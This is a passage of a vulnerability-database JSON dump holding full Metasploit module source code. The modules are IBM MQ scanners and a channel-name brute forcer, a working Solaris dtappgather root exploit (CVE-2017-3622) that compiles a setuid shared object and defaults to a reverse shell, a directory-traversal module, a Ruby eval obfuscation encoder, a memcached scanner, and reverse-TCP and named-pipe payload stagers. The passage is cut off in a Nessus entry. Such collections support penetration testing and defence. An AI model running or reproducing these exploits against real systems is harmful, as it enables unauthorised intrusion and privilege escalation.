chan_type = \"\\x08\"\n end\n\n packet = \"\\x54\\x53\\x48\\x20\" + \t\t# StructID\n \"\\x00\\x00\\x01\\x0c\" + \t\t\t# MQSegmLen\n \"\\x02\" + \t\t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t\t# SegmType\n \"\\x01\" + \t\t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\t# LUW Ident\n \"\\x22\\x02\\x00\\x00\" + \t\t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t\t# StructId\n \"\\x0d\" + \t\t\t\t\t# FAP level\n chan_type + \t\t\t\t# CapFlag1 - Message Type\n \"\\x00\" + \t\t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x32\\x00\" + \t\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" + \t\t\t# SeqWrapVal\n chan + \t\t\t\t\t# Channel Name\n \"\\x87\" + \t\t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t\t# ECapFlag2\n \"\\x5b\\x01\" +\t\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t\t# IniErrFlg2\n \"\\x55\" + \t\t\t\t\t# Reserved1\n \"\\x00\\xff\" +\t\t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t\t# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# ConvBySkt\n \"\\x05\" + \t\t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t\t# Reserved3\n \"\\x10\\x13\\x00\\x00\" + \t\t\t# ProcessId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# ThreadId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# TraceId\n \"MQMM09000000\" +\t\t \t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t\t# MQM ID\n \"\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +\t# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# Unknown2\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + \t# Unknown3\n \"\\x00\\x00\\x00\\x00\\x00\" \t\t\t# Unknown4\n end\n\n\n def run_host(ip)\n chan = datastore['CHANNEL']\n if chan.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n raise Msf::OptionValidateError.new(['CHANNEL'])\n end\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n while(ports.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_port = ports.shift\n break if not this_port\n t << framework.threads.spawn(\"Module(#{self.refname})-#{ip}:#{this_port}\", false, this_port) do |port|\n begin\n data_recv = \"\"\n 3.times do |channel_type|\n data_recv = send_packet(ip,port,channel_type)\n if data_recv.nil?\n next\n end\n # check if CHANNEL_WRONG_TYPE error received and retry with different type\n if data_recv[data_recv.length-4...data_recv.length] != \"\\x02\\x00\\x00\\x00\"\n break\n end\n end\n if data_recv.nil?\n print_status(\"No response received. Try increasing TIMEOUT value.\")\n print_line\n next\n end\n status_code = data_recv[-4..-1]\n if status_code == \"\\x18\\x00\\x00\\x00\"\n print_status(\"Channel Requires SSL. Could not get more information.\")\n print_line\n end\n if not data_recv[0...3].include?('TSH')\n next\n end\n if status_code == \"\\x01\\x00\\x00\\x00\"\n print_error('Channel \"' + chan + '\" does not exist.')\n print_line\n end\n if status_code == \"\\x02\\x00\\x00\\x00\" or status_code == \"\\x06\\x00\\x00\\x00\"\n print_error('Unsupported channel type. Try a different channel.')\n print_line\n end\n if data_recv.length < 180\n next\n end\n qm_name = data_recv[76...124].delete(' ')\n mq_version = data_recv[180...188].scan(/../).collect{|x| x.to_i}.join('.')\n print_good(\"#{ip}:#{port} - Queue Manager Name: #{qm_name} - MQ Version: #{mq_version}\")\n print_line\n end\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def send_packet(ip,port,channel_type)\n begin\n timeout = datastore['TIMEOUT'].to_i\n packet = create_packet(channel_type)\n s = connect(false,\n {\n 'RPORT' => port,\n 'RHOST' => ip,\n }\n )\n s.put(packet)\n data = s.get_once(-1,timeout)\n return data\n rescue ::Rex::ConnectionRefused\n print_error(\"#{ip}:#{port} - TCP Port Closed.\")\n print_line\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n print_error(\"#{ip}:#{port} - Connection Failed.\")\n print_line\n rescue ::Interrupt\n raise $!\n ensure\n if s\n disconnect(s) rescue nil\n end\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_enum.rb"}, {"lastseen": "2019-11-29T22:02:43", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.\n", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}, {"lastseen": "2019-11-23T04:39:04", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal vulnerability in the `dtappgather` executable included with Common Desktop Environment (CDE) on unpatched Solaris systems prior to Solaris 10u11 which allows users to gain root privileges. dtappgather allows users to create a user-owned directory at any location on the filesystem using the `DTUSERSESSION` environment variable. This module creates a directory in `/usr/lib/locale`, writes a shared object to the directory, and runs the specified SUID binary with the shared object loaded using the `LC_TIME` environment variable. This module has been tested successfully on: Solaris 9u7 (09/04) (x86); Solaris 10u1 (01/06) (x86); Solaris 10u2 (06/06) (x86); Solaris 10u4 (08/07) (x86); Solaris 10u8 (10/09) (x86); Solaris 10u9 (09/10) (x86).\n", "modified": "2019-01-10T19:19:14", "published": "2018-09-18T07:23:10", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/EXTREMEPARR_DTAPPGATHER_PRIV_ESC", "href": "", "type": "metasploit", "title": "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Solaris 'EXTREMEPARR' dtappgather Privilege Escalation\",\n 'Description' => %q{\n This module exploits a directory traversal vulnerability in the\n `dtappgather` executable included with Common Desktop Environment (CDE)\n on unpatched Solaris systems prior to Solaris 10u11 which allows users\n to gain root privileges.\n\n dtappgather allows users to create a user-owned directory at any\n location on the filesystem using the `DTUSERSESSION` environment\n variable.\n\n This module creates a directory in `/usr/lib/locale`, writes a shared\n object to the directory, and runs the specified SUID binary with the\n shared object loaded using the `LC_TIME` environment variable.\n\n This module has been tested successfully on:\n\n Solaris 9u7 (09/04) (x86);\n Solaris 10u1 (01/06) (x86);\n Solaris 10u2 (06/06) (x86);\n Solaris 10u4 (08/07) (x86);\n Solaris 10u8 (10/09) (x86);\n Solaris 10u9 (09/10) (x86).\n },\n 'References' =>\n [\n ['BID', '97774'],\n ['CVE', '2017-3622'],\n ['EDB', '41871'],\n ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],\n ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']\n ],\n 'Notes' => { 'AKA' => ['EXTREMEPARR'] },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Shadow Brokers', # exploit\n 'Hacker Fantastic', # dtappgather-poc.sh\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Apr 24 2017',\n 'Privileged' => true,\n 'Platform' => ['solaris', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\n 'Targets' => [['Auto', {}]],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n # Some useful example SUID executables:\n # * /usr/bin/at\n # * /usr/bin/cancel\n # * /usr/bin/chkey\n # * /usr/bin/lp\n # * /usr/bin/lpset\n # * /usr/bin/lpstat\n # * /usr/lib/lp/bin/netpr\n # * /usr/sbin/lpmove\n OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),\n OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def suid_bin_path\n datastore['SUID_PATH']\n end\n\n def dtappgather_path\n datastore['DTAPPGATHER_PATH']\n end\n\n def mkdir(path)\n vprint_status \"Creating directory '#{path}'\"\n cmd_exec \"mkdir -p '#{path}'\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\n unless output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def symlink(link_target, link_name)\n vprint_status \"Symlinking #{link_target} to #{link_name}\"\n rm_f link_name\n cmd_exec \"ln -sf #{link_target} #{link_name}\"\n register_file_for_cleanup link_name\n end\n\n def check\n [dtappgather_path, suid_bin_path].each do |path|\n unless setuid? path\n vprint_error \"#{path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{path} is setuid\"\n end\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n version = kernel_release\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless [CheckCode::Detected, CheckCode::Appears].include? check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless writable? datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n # Remove appmanager directory and contents\n appmanager_path = '/var/dt/appconfig/appmanager'\n vprint_status \"Cleaning appmanager directory #{appmanager_path}\"\n cmd_exec \"chmod -R 755 #{appmanager_path}/*\"\n cmd_exec \"rm -rf #{appmanager_path}/*\"\n rm_f appmanager_path\n\n # Create writable directory in /usr/lib/locale\n locale_path = '/usr/lib/locale'\n locale_name = rand_text_alphanumeric 5..10\n new_dir = \"#{locale_path}/#{locale_name}\"\n vprint_status \"Creating directory #{new_dir}\"\n depth = 3\n cmd_exec \"DTUSERSESSION=. /usr/dt/bin/dtappgather\"\n depth.times do\n cmd_exec \"DTUSERSESSION=.. /usr/dt/bin/dtappgather\"\n end\n symlink locale_path, appmanager_path\n cmd_exec \"DTUSERSESSION=#{locale_name} #{dtappgather_path}\"\n unless cmd_exec(\"ls -al #{locale_path} | grep #{locale_name}\").to_s.include? locale_name\n fail_with Failure::NotVulnerable, \"Could not create directory #{new_dir}\"\n end\n\n print_good \"Created directory #{new_dir}\"\n register_dir_for_cleanup new_dir\n\n rm_f appmanager_path\n cmd_exec \"chmod 755 #{new_dir}\"\n\n # Upload and compile shared object\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n\n so = <<-EOF\n void __attribute__((constructor)) cons() {\n setuid(0);\n setgid(0);\n execle(\"#{payload_path}\", \"\", 0, 0);\n _exit(0);\n }\n EOF\n\n so_name = \".#{rand_text_alphanumeric 5..10}\"\n so_path = \"#{base_path}/#{so_name}\"\n upload_and_compile so_path, so\n\n vprint_status \"Writing shared objects to #{new_dir}\"\n cmd_exec \"cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'\"\n register_file_for_cleanup \"#{new_dir}/#{locale_name}.so.2\"\n cmd_exec \"cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'\"\n register_file_for_cleanup \"#{new_dir}/#{locale_name}.so.3\"\n\n # Upload and execute payload\n upload payload_path, generate_payload_exe\n cmd_exec \"chmod +x #{payload_path}\"\n\n print_status 'Executing payload...'\n cmd_exec \"LC_TIME=#{locale_name} #{suid_bin_path} & echo \"\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb"}, {"lastseen": "2019-11-23T05:39:42", "bulletinFamily": "exploit", "description": "This module allows for traversing the file system of a host running httpdasm v0.92.\n", "modified": "2019-08-15T23:10:44", "published": "2018-06-18T15:25:33", "id": "MSF:AUXILIARY/SCANNER/HTTP/HTTPDASM_DIRECTORY_TRAVERSAL", "href": "", "type": "metasploit", "title": "Httpdasm Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Httpdasm Directory Traversal',\n 'Description' => %q{\n This module allows for traversing the file system of a host running httpdasm v0.92.\n },\n 'Author' =>\n [\n 'John Leitch', # EDB POC\n 'Shelby Pace' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['EDB', '15861']\n ]\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Path to traverse to', '%2e%2e%5c' * 8 + 'boot.ini'])\n ])\n\n end\n\n def run\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n })\n\n if res && res.code == 200\n print_status(res.body)\n path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)\n else\n if res\n print_error(\"Unexpected response from server: #{res.code}\")\n else\n print_error(\"The server timed out.\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb"}, {"lastseen": "2019-11-24T23:33:59", "bulletinFamily": "exploit", "description": "This encoder returns a base64 string encapsulated in eval(%(base64 encoded string).unpack(%(m0)).first).\n", "modified": "2018-04-24T16:33:27", "published": "2018-04-21T08:54:26", "id": "MSF:ENCODER/RUBY/BASE64", "href": "", "type": "metasploit", "title": "Ruby Base64 Encoder", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Encoder\n Rank = GreatRanking\n\n def initialize\n super(\n 'Name' => 'Ruby Base64 Encoder',\n 'Description' => %q{\n This encoder returns a base64 string encapsulated in\n eval(%(base64 encoded string).unpack(%(m0)).first).\n },\n 'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',\n 'License' => BSD_LICENSE,\n 'Arch' => ARCH_RUBY)\n end\n\n def encode_block(state, buf)\n %w{( ) . % e v a l u n p c k m 0 f i r s t}.each do |c|\n raise BadcharError if state.badchars.include?(c)\n end\n\n b64 = Rex::Text.encode_base64(buf)\n\n state.badchars.each_byte do |byte|\n raise BadcharError if b64.include?(byte.chr)\n end\n\n return \"eval(%(\" + b64 + \").unpack(%(m0)).first)\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/ruby/base64.rb"}, {"lastseen": "2019-11-30T16:03:28", "bulletinFamily": "exploit", "description": "This module can be used to discover Memcached servers which expose the unrestricted UDP port 11211. A basic \"version\" request is executed to obtain the version of memcached.\n", "modified": "2018-03-07T02:16:22", "published": "2018-03-07T01:54:00", "id": "MSF:AUXILIARY/SCANNER/MEMCACHED/MEMCACHED_UDP_VERSION", "href": "", "type": "metasploit", "title": "Memcached UDP Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n\n def initialize\n super(\n 'Name' => 'Memcached UDP Version Scanner',\n 'Description' => %q(\n This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"version\" request is executed to obtain\n the version of memcached.\n ),\n 'Author' =>\n [\n 'Jon Hart <jon_hart@rapid7.com>' # Metasploit scanner module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Jul 23, 2003',\n 'References' =>\n [\n ['URL', 'https://github.com/memcached/memcached/blob/master/doc/protocol.txt']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(11211)\n ]\n )\n end\n\n def build_probe\n # Memcached version probe, per https://github.com/memcached/memcached/blob/master/doc/protocol.txt\n @memcached_probe ||= [\n rand(2**16), # random request ID\n 0, # sequence number\n 1, # number of datagrams in this sequence\n 0, # reserved; must be 0\n \"version\\r\\n\"\n ].pack(\"nnnna*\")\n end\n\n def scanner_process(data, shost, sport)\n # Check the response data for a \"VERSION\" repsonse\n if /VERSION (?<version>[\\d\\.]+)\\r\\n/ =~ data\n print_good(\"#{shost}:#{sport}/udp memcached version #{version}\")\n report_service(\n host: shost,\n proto: 'udp',\n port: rport,\n info: version,\n name: 'memcached'\n )\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/memcached/memcached_udp_version.rb"}, {"lastseen": "2019-11-27T19:27:46", "bulletinFamily": "exploit", "description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\n", "modified": "2018-02-28T02:24:51", "published": "2018-02-23T02:03:37", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_NAMED_PIPE", "href": "", "type": "metasploit", "title": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_named_pipe'\nrequire 'msf/core/payload/windows/bind_named_pipe'\n\nmodule MetasploitModule\n\n CachedSize = 336\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindNamedPipe\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x86 Bind Named Pipe Stager',\n 'Description' => 'Listen for a pipe connection (Windows x86)',\n 'Author' => [ 'UserExistsError' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindNamedPipe,\n 'Convention' => 'sockedi', # hPipe\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_named_pipe.rb"}, {"lastseen": "2019-12-01T13:14:05", "bulletinFamily": "exploit", "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker\n", "modified": "2018-03-04T23:43:15", "published": "2018-02-04T07:01:27", "id": "MSF:PAYLOAD/WINDOWS/X64/METERPRETER/REVERSE_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/x64/reverse_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 585\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4_x64\n\n def self.handler_type_alias\n \"reverse_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb"}], "nessus": [{"lastseen": "2019-11-01T03:02:16", "bulletinFamily": "scanner", "description": "This update for Chromium to version 69.0.3497.92 fixes the following\nissues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in 